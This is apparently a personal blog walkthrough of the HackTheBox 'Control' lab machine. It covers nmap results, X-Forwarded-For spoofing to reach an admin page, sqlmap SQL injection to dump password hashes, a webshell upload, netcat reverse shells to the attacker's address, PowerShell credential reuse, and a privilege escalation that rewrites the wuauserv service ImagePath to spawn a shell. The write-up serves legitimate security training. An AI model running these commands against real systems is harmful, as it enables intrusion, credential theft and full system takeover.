This post provides a walkthrough of the Control system on HackTheBox. On user part is finding SQLi and getting credentials. Privesc part is a bit hard for me. I spend too much time. IPPSEC videos help me on privec part. If you do not follow ippsec, you lose a lot.
nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
# Nmap 7.80 scan initiated Fri Apr 24 15:50:07 2020 as: nmap -A -T4 -oA control 10.10.10.167
Nmap scan report for 10.10.10.167
Host is up (0.13s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Fidelity
135/tcp open msrpc Microsoft Windows RPC
3306/tcp open mysql?
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, JavaRMI, LANDesk-RC, NCP, NotesRPC, SIPOptions, SMBProgNeg, WMSRequest, afp, oracle-tns:
|_ Host '10.10.14.4' is not allowed to connect to this MariaDB server
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.80%I=7%D=4/24%Time=5EA2E094%P=x86_64-apple-darwin17.7.
SF:0%r(HTTPOptions,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.4'\x20is\x20
SF:not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(
SF:SMBProgNeg,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.4'\x20is\x20not\x
SF:20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(FourO
SF:hFourRequest,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.4'\x20is\x20not
SF:\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(SIP
SF:Options,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.4'\x20is\x20not\x20a
SF:llowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(LANDesk-
SF:RC,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.4'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(NCP,49,"E\0\0
SF:\x01\xffj\x04Host\x20'10\.10\.14\.4'\x20is\x20not\x20allowed\x20to\x20c
SF:onnect\x20to\x20this\x20MariaDB\x20server")%r(NotesRPC,49,"E\0\0\x01\xf
SF:fj\x04Host\x20'10\.10\.14\.4'\x20is\x20not\x20allowed\x20to\x20connect\
SF:x20to\x20this\x20MariaDB\x20server")%r(JavaRMI,49,"E\0\0\x01\xffj\x04Ho
SF:st\x20'10\.10\.14\.4'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x2
SF:0this\x20MariaDB\x20server")%r(WMSRequest,49,"E\0\0\x01\xffj\x04Host\x2
SF:0'10\.10\.14\.4'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this
SF:\x20MariaDB\x20server")%r(oracle-tns,49,"E\0\0\x01\xffj\x04Host\x20'10\
SF:.10\.14\.4'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20M
SF:ariaDB\x20server")%r(afp,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.4'\
SF:x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20se
SF:rver");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 3306/tcp)
HOP RTT ADDRESS
1 149.66 ms 10.10.14.1
2 149.60 ms 10.10.10.167
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 24 15:50:47 2020 -- 1 IP address (1 host up) scanned in 39.89 seconds
When I visited the web page. I examine source code. I saw ip address and I cannot access admin web page.
/admin.php 
/index.php 
In here we use the X-Forwarded-For HTTP header field is a common method for identifying the originating IP address of a client connecting to a web server through an HTTP proxy or load balancer. I add the header with firefox extensions. After that I access admin web page. I found SQLi in /view_product.php I use the burp suite and send a request product. Saving the request file for using sqlmap. This is request.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /view_product.php HTTP/1.1
Host: 10.10.10.167
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
Origin: http://10.10.10.167
Connection: close
Referer: http://10.10.10.167/admin.php
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 192.168.4.28
productId=34
Sqlmap did everything for us. We know database service is Mysql. I save the request on sql file.
1
sqlmap -r sql -D mysql -T user -C Password,User --dump
We got the user and password and crack the hash.
Hector:l33th4x0rhector
I cannot access the box outside with this creds. I upload shell with sqlmap.
1
sqlmap -r sql --file-write=/Desktop/htb/control/wwwolf-php-webshell/webshell.php --file-dest=C:/inetpub/wwwroot/shell.php
Now we got the low privilege user shell. I try to run Powershell command on this shell. But I cannot run. So I upload netcat with sqlmap. I get a shell with using netcat.
1
.\nc.exe 10.10.14.4 4444 -e cmd.exe
After that Its easy to run Powershell command.
1
powershell -nop -exec bypass
We knew the Hector creds. I create Powershell script to jump to Hector.
1
2
3
4
5
6
$password = "l33th4x0rhector" | ConvertTo-SecureString -asPlainText -Force ;
$username = "Fidelity\Hector" ;
$credential = New-Object System.Management.Automation.PSCredential($username,$password) ;
echo $credentials
Invoke-Command -ComputerName Fidelity -Credential $credential -ScriptBlock {cp C:\inetpub\wwwroot\nc.exe C:\Users\Hector\Documents} ;
Invoke-Command -ComputerName Fidelity -Credential $credential -ScriptBlock {C:\Users\Hector\Documents\nc.exe 10.10.14.4 7878 -e cmd.exe} ;
I have a Hector shell.
User Flag
Privilege Escalation
When I searched for what’s in the machine, I found a ConsoleHost_history.txt in the machine.
1
2
get-childitem HKLM:\SYSTEM\CurrentControlset | format-list
get-acl HKLM:\SYSTEM\CurrentControlSet | format-list
I search the running service on the box.
1
get-childitem HKLM:\SYSTEM\CurrentControlset\services | format-list
I found the wuauserv service. This service, system service that has system permissions for the windows update. In this part we can change imagepath this service.
wuauserv service imagepath like this.
1
ImagePath : C:\Windows\system32\svchost.exe -k netsvcs -p
After that 
1
2
3
4
5
Get-ItemProperty HKLM:\System\CurrentControlSet\services\wuauserv; reg add "HKLM\System\CurrentControlSet\services\wuauserv" /t REG_EXPAND_SZ /v ImagePath /d "C:\inetpub\wwwroot\nc.exe 10.10.14.4 9090 -e cmd" /f;
and restarting service
Stop-Service wuauserv;Start-Service wuauserv
Root Flag
